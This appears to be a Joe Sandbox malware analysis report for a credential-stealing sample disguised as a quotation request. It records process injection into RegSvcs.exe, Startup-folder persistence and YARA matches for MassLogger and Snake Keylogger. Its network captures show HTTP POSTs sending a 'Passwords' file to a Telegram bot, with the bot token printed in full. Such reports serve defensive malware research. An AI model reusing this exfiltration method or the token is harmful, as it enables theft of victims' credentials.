2024-12-16 14:00:17 UTC	876	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 14:00:17 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 346386 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KJG5kuBTyJNmWsy8Cp81INmfXZsK9y%2F5bDO1aZSMbY0AZSRcsRgzLtWMUGLmO5j2uJeAMr4VesDG87Q2r6vHayUtunXYoAkx1sLaRbY%2FguMsoXKxeAMk68cNoI9i%2BPpZiWu3mKSF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2f32e64b098cb4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1760&rtt_var=691&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1549071&cwnd=189&unsent_bytes=0&cid=eb60ffd6e53ba2f1&ts=503&x=0"
2024-12-16 14:00:17 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49707	149.154.167.220	443	432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 14:00:25 UTC	296	OUT	POST /bot7860026700:AAEpF_wLAWoXb_zUOYnzupMyY_Wew8AW-zg/sendDocument?chat_id=5267093791&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd1db012dc04f6 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2024-12-16 14:00:25 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 64 62 30 31 32 64 63 30 34 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd1db012dc04f6Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-16 14:00:25 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 14:00:25 GMT Content-Type: application/json Content-Length: 569 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 14:00:25 UTC	569	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 36 30 30 32 36 37 30 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 70 69 6c 65 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 70 69 6c 65 74 70 6f 6e 74 69 75 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 32 36 37 30 39 33 37 39 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 65 72 72 69 63 6b 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 72 65 65 6e 69 73 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 65 72 72 69 63 6b 67 72 65 65 6e 69 73 68 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 Data Ascii: {"ok":true,"result":{"message_id":87,"from":{"id":7860026700,"is_bot":true,"first_name":"pilet","username":"piletpontiusbot"},"chat":{"id":5267093791,"first_name":"Derrick","last_name":"Greenish","username":"Derrickgreenish","type":"private"},"date":17343

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49712	104.21.67.152	443	4424	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 14:00:28 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 14:00:29 UTC	882	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 14:00:29 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 346398 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XKNj6APa%2F%2Fqqy%2BAyTUS8JdTJ6ZNgRv1Q4WbkvWQkMcibZHpcSzBkq92xEOAkOdna3hqp89HxPDUYSalppWRuuk%2BkOtnmk95nD5u72HAfNhg0N%2B3S3iXlR%2BYZoWk0aAJ3dml6oKs7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2f332e3bb142f5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1627&rtt_var=631&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1707602&cwnd=195&unsent_bytes=0&cid=83d2bcd8503266f5&ts=456&x=0"
2024-12-16 14:00:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49731	149.154.167.220	443	4424	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 14:00:36 UTC	296	OUT	POST /bot7860026700:AAEpF_wLAWoXb_zUOYnzupMyY_Wew8AW-zg/sendDocument?chat_id=5267093791&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd1db019aa611f Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2024-12-16 14:00:36 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 64 62 30 31 39 61 61 36 31 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd1db019aa611fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-16 14:00:36 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 14:00:36 GMT Content-Type: application/json Content-Length: 569 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 14:00:36 UTC	569	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 36 30 30 32 36 37 30 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 70 69 6c 65 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 70 69 6c 65 74 70 6f 6e 74 69 75 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 32 36 37 30 39 33 37 39 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 65 72 72 69 63 6b 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 72 65 65 6e 69 73 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 65 72 72 69 63 6b 67 72 65 65 6e 69 73 68 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 Data Ascii: {"ok":true,"result":{"message_id":89,"from":{"id":7860026700,"is_bot":true,"first_name":"pilet","username":"piletpontiusbot"},"chat":{"id":5267093791,"first_name":"Derrick","last_name":"Greenish","username":"Derrickgreenish","type":"private"},"date":17343

Target ID:	0
Start time:	09:00:08
Start date:	16/12/2024
Path:	C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe"
Imagebase:	0xfd0000
File size:	1'004'544 bytes
MD5 hash:	29FA7717196E21C8A1F9C7C5B8883F77
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:00:09
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Allene\nonplacental.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe"
Imagebase:	0x280000
File size:	1'004'544 bytes
MD5 hash:	29FA7717196E21C8A1F9C7C5B8883F77
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:00:10
Start date:	16/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe"
Imagebase:	0x6b0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.3338328536.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3338328536.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3338328536.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	09:00:22
Start date:	16/12/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs"
Imagebase:	0x7ff7010d0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:00:22
Start date:	16/12/2024
Path:	C:\Users\user\AppData\Local\Allene\nonplacental.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Allene\nonplacental.exe"
Imagebase:	0x280000
File size:	1'004'544 bytes
MD5 hash:	29FA7717196E21C8A1F9C7C5B8883F77
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:00:23
Start date:	16/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Allene\nonplacental.exe"
Imagebase:	0x960000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	8.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	60

Executed Functions

Function 00FD3B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FD3B68
IsDebuggerPresent.KERNEL32 ref: 00FD3B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,010952F8,010952E0,?,?), ref: 00FD3BEB

Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06

Part of subcall function 00FE092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00FD3C14,010952F8,?,?,?), ref: 00FE096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00FD3C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,01087770,00000010), ref: 0100D281
SetCurrentDirectoryW.KERNEL32(?,010952F8,?,?,?), ref: 0100D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01084260,010952F8,?,?,?), ref: 0100D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 0100D346

Part of subcall function 00FD3A46: GetSysColorBrush.USER32(0000000F), ref: 00FD3A50
Part of subcall function 00FD3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00FD3A5F
Part of subcall function 00FD3A46: LoadIconW.USER32(00000063), ref: 00FD3A76
Part of subcall function 00FD3A46: LoadIconW.USER32(000000A4), ref: 00FD3A88
Part of subcall function 00FD3A46: LoadIconW.USER32(000000A2), ref: 00FD3A9A
Part of subcall function 00FD3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FD3AC0
Part of subcall function 00FD3A46: RegisterClassExW.USER32(?), ref: 00FD3B16

Part of subcall function 00FD39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FD3A03
Part of subcall function 00FD39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FD3A24
Part of subcall function 00FD39D5: ShowWindow.USER32(00000000,?,?), ref: 00FD3A38
Part of subcall function 00FD39D5: ShowWindow.USER32(00000000,?,?), ref: 00FD3A41

Part of subcall function 00FD434A: _memset.LIBCMT ref: 00FD4370
Part of subcall function 00FD434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FD4415

Strings

runas, xrefs: 0100D33A
This is a third-party compiled AutoIt script., xrefs: 0100D279

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: 5f694f41792bce00b4c9f5ce4414a0e619365e7dcc0cef73177497c171cf7348
Instruction ID: 2085e7ba9787c862204fef01ba17a4c9b360e6d410670c21a825fce01e5ab35b
Opcode Fuzzy Hash: 5f694f41792bce00b4c9f5ce4414a0e619365e7dcc0cef73177497c171cf7348
Instruction Fuzzy Hash: B7513930D08209AEDF22FBF5DC15AFE7BB6BB05310F084097F5D1A6241DA795605EB21

Function 00FD49A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00FD49CD

Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06

GetCurrentProcess.KERNEL32(?,0105FAEC,00000000,00000000,?), ref: 00FD4A9A
IsWow64Process.KERNEL32(00000000), ref: 00FD4AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00FD4AE7
FreeLibrary.KERNEL32(00000000), ref: 00FD4AF2
GetSystemInfo.KERNEL32(00000000), ref: 00FD4B23
GetSystemInfo.KERNEL32(00000000), ref: 00FD4B2F

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 88eeaefa3edb98365c3d96c584dbf3db4e2748c895bcfa1a76f79f65c64c25f9
Instruction ID: 18dbd64c3c0ad944c535d433cb5d67a7ffdbf6bd345fb8e89b7acd5b2da5d2e9
Opcode Fuzzy Hash: 88eeaefa3edb98365c3d96c584dbf3db4e2748c895bcfa1a76f79f65c64c25f9
Instruction Fuzzy Hash: 2391B7319897C1DFD732DBA885501AABFF6AF2A300F48499ED0CA93741D234F508D769

Function 00FD4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00FD4D8E,?,?,00000000,00000000), ref: 00FD4E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FD4D8E,?,?,00000000,00000000), ref: 00FD4EB0
LoadResource.KERNEL32(?,00000000,?,?,00FD4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FD4E2F), ref: 0100D937
SizeofResource.KERNEL32(?,00000000,?,?,00FD4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FD4E2F), ref: 0100D94C
LockResource.KERNEL32(00FD4D8E,?,?,00FD4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FD4E2F,00000000), ref: 0100D95F

Strings

SCRIPT, xrefs: 00FD4EA6

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 6b54c1a02e4d68be087b9af47bf53fc6b04c274d260cf810d8d60155bb996a22
Instruction ID: 8332356c9bef3459f64b3ef6f1c6e4a228be947b84be4ed29df0c97b8b2d11ad
Opcode Fuzzy Hash: 6b54c1a02e4d68be087b9af47bf53fc6b04c274d260cf810d8d60155bb996a22
Instruction Fuzzy Hash: 0D11A0B5200301BFD7218BA5EC48F2B7BBAFBC5B51F24426DF445C6280DB76E8009761

Function 00FDFCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 06728eb459f1bf4c405859fe1a86f5d701bfe798d7f452ecf576333037d0e4f9
